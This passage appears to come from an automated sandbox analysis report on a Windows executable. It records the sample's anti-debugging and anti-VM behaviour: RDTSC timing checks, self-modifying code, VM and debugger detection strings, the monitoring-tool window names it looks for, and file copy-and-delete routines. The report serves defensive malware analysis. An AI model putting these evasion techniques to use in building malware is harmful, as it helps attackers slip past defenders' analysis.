                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BB3992 second address: BB3998 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BB8874 second address: BB8892 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jno 00007F0AD8C6A9B6h 0x00000009 jmp 00007F0AD8C6A9C1h 0x0000000e pop eax 0x0000000f push esi 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BB8892 second address: BB8898 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BB89CE second address: BB89D2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BB8CAD second address: BB8CDE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F0AD95F8826h 0x0000000a jmp 00007F0AD95F8835h 0x0000000f jmp 00007F0AD95F882Bh 0x00000014 popad 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 popad 0x00000019 pushad 0x0000001a popad 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BB8CDE second address: BB8CF6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0AD8C6A9BFh 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push ecx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BB8FDA second address: BB8FE2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BB9152 second address: BB9156 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BB92A5 second address: BB92D1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jnp 00007F0AD95F8844h 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BB92D1 second address: BB9305 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0AD8C6A9C9h 0x00000007 jmp 00007F0AD8C6A9C2h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push esi 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BB9305 second address: BB930F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push edi 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BB930F second address: BB9314 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BC367E second address: BC3688 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F0AD95F8826h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BC3688 second address: BC368C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BC368C second address: BC36CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F0AD95F8835h 0x0000000b pushad 0x0000000c jne 00007F0AD95F8826h 0x00000012 pushad 0x00000013 popad 0x00000014 jbe 00007F0AD95F8826h 0x0000001a push ebx 0x0000001b pop ebx 0x0000001c popad 0x0000001d popad 0x0000001e push eax 0x0000001f push edx 0x00000020 push eax 0x00000021 push edx 0x00000022 push eax 0x00000023 pop eax 0x00000024 jmp 00007F0AD95F882Ah 0x00000029 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BC36CA second address: BC36CE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BC36CE second address: BC36D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BC36D4 second address: BC36E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jng 00007F0AD8C6A9B6h 0x0000000d push eax 0x0000000e pop eax 0x0000000f popad 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BC36E4 second address: BC36E9 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BCA48B second address: BCA492 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BCC190 second address: BCC19C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a push edx 0x0000000b pop edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BCC19C second address: BCC1A2 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BCC1A2 second address: BCC1B7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jno 00007F0AD95F8826h 0x0000000a jmp 00007F0AD95F882Bh 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BCC1B7 second address: BCC1BB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BCF81F second address: BCF829 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BCF829 second address: BCF86A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jl 00007F0AD8C6A9CAh 0x0000000e jmp 00007F0AD8C6A9C2h 0x00000013 pushad 0x00000014 popad 0x00000015 popad 0x00000016 push eax 0x00000017 push edx 0x00000018 push edi 0x00000019 jl 00007F0AD8C6A9B6h 0x0000001f jmp 00007F0AD8C6A9C4h 0x00000024 pop edi 0x00000025 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BE17C8 second address: BE17CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BE36DD second address: BE36E8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F0AD8C6A9B6h 0x0000000a popad 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BE32AF second address: BE32B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BE32B3 second address: BE32B7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BE32B7 second address: BE32C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 jl 00007F0AD95F8826h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BE32C8 second address: BE32CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BE3443 second address: BE3447 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BF2F80 second address: BF2F84 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BF1DDF second address: BF1E09 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0AD95F8832h 0x00000009 popad 0x0000000a push edi 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e pop eax 0x0000000f jmp 00007F0AD95F882Eh 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BF1E09 second address: BF1E0D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BF28EE second address: BF2904 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jnp 00007F0AD95F8826h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jg 00007F0AD95F882Ah 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BF2904 second address: BF2927 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0AD8C6A9C3h 0x00000007 jo 00007F0AD8C6A9C2h 0x0000000d js 00007F0AD8C6A9B6h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BF2A6A second address: BF2A8C instructions: 0x00000000 rdtsc 0x00000002 js 00007F0AD95F8826h 0x00000008 jmp 00007F0AD95F8830h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f js 00007F0AD95F882Ch 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BF2A8C second address: BF2A90 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BF2A90 second address: BF2AAF instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jmp 00007F0AD95F8831h 0x00000008 pop ebx 0x00000009 push eax 0x0000000a push edx 0x0000000b js 00007F0AD95F8826h 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BF2C42 second address: BF2C4C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push edi 0x00000007 pop edi 0x00000008 push edx 0x00000009 pop edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BF2C4C second address: BF2C76 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0AD95F8836h 0x00000007 jg 00007F0AD95F8826h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f popad 0x00000010 push esi 0x00000011 push eax 0x00000012 push edx 0x00000013 jng 00007F0AD95F8826h 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BF46B0 second address: BF46C3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0AD8C6A9BBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BF46C3 second address: BF46D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0AD95F8832h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BF46D9 second address: BF46DD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BF7098 second address: BF70AF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jnp 00007F0AD95F882Ch 0x0000000b jnp 00007F0AD95F8826h 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 push edi 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BF76D0 second address: BF771E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 jmp 00007F0AD8C6A9C6h 0x0000000a popad 0x0000000b push eax 0x0000000c push eax 0x0000000d jmp 00007F0AD8C6A9BDh 0x00000012 pop eax 0x00000013 mov eax, dword ptr [esp+04h] 0x00000017 pushad 0x00000018 jmp 00007F0AD8C6A9C5h 0x0000001d jc 00007F0AD8C6A9BCh 0x00000023 push eax 0x00000024 push edx 0x00000025 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BF771E second address: BF772E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 mov eax, dword ptr [eax] 0x00000007 pushad 0x00000008 jl 00007F0AD95F882Ch 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BF772E second address: BF7747 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007F0AD8C6A9B8h 0x0000000a push esi 0x0000000b pop esi 0x0000000c popad 0x0000000d mov dword ptr [esp+04h], eax 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 push ebx 0x00000015 pop ebx 0x00000016 pushad 0x00000017 popad 0x00000018 popad 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BF8B09 second address: BF8B26 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0AD95F8839h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BF8B26 second address: BF8B2C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BF8B2C second address: BF8B36 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jne 00007F0AD95F8826h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BF8B36 second address: BF8B3C instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BF8B3C second address: BF8B48 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BF8B48 second address: BF8B52 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F0AD8C6A9B6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BF8B52 second address: BF8B61 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push ecx 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BF8B61 second address: BF8B66 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BFA32B second address: BFA330 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 517050B second address: 517052D instructions: 0x00000000 rdtsc 0x00000002 mov di, 5CA6h 0x00000006 pop edx 0x00000007 pop eax 0x00000008 popad 0x00000009 push ecx 0x0000000a jmp 00007F0AD8C6A9BAh 0x0000000f mov dword ptr [esp], ebp 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 mov eax, edx 0x00000017 mov ebx, 1230CC5Ch 0x0000001c popad 0x0000001d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 517052D second address: 5170553 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0AD95F8832h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F0AD95F882Ah 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5170553 second address: 5170557 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5170557 second address: 517055D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 517055D second address: 5170563 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5170563 second address: 5170576 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c push edi 0x0000000d pop eax 0x0000000e mov di, 69F0h 0x00000012 popad 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51705F4 second address: 5170614 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0AD8C6A9C5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5170614 second address: 5170618 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5170618 second address: 517061C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 517061C second address: 5170622 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Tries to evade debugger and weak emulator (self modifying code)
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 96DBD1 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 96DB17 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: B17944 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 96DAF5 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: B973C3 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDescJump to behavior
                Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersionJump to behavior
                Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersionJump to behavior
                Source: C:\Users\user\Desktop\file.exeEvaded block: after key decisiongraph_0-39178
                Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006940F0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,0_2_006940F0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0068E530 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,0_2_0068E530
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00681710 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00681710
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006947C0 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,0_2_006947C0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0068F7B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_0068F7B0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00694B60 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00694B60
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00693B00 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,0_2_00693B00
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0068DB80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,0_2_0068DB80
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0068BE40 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,0_2_0068BE40
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0068EE20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose,0_2_0068EE20
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0068DF10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_0068DF10
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00681160 GetSystemInfo,ExitProcess,0_2_00681160
                Source: file.exe, file.exe, 00000000.00000002.2132139185.0000000000AF1000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
                Source: file.exe, 00000000.00000002.2132664415.0000000001482000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                Source: file.exe, 00000000.00000002.2132664415.000000000140E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMware
                Source: file.exe, 00000000.00000002.2132664415.0000000001452000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWh
                Source: file.exe, 00000000.00000002.2132139185.0000000000AF1000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-37993
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-38009
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-37990
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-38005
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-38045
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-37879
                Source: C:\Users\user\Desktop\file.exeSystem information queried: ModuleInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information queried: ProcessInformationJump to behavior

                Anti Debugging

                barindex
                Hides threads from debuggers
                Source: C:\Users\user\Desktop\file.exeThread information set: HideFromDebuggerJump to behavior
                Tries to detect sandboxes and other dynamic analysis tools (window names)
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: regmonclass
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: gbdyllo
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: procmon_window_class
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: ollydbg
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: filemonclass
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exeFile opened: NTICE
                Source: C:\Users\user\Desktop\file.exeFile opened: SICE
                Source: C:\Users\user\Desktop\file.exeFile opened: SIWVID
                Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00684610 VirtualProtect ?,00000004,00000100,000000000_2_00684610
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00699BB0 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00699BB0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00699AA0 mov eax, dword ptr fs:[00000030h]0_2_00699AA0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00697690 GetWindowsDirectoryA,GetVolumeInformationA,GetProcessHeap,RtlAllocateHeap,wsprintfA,0_2_00697690
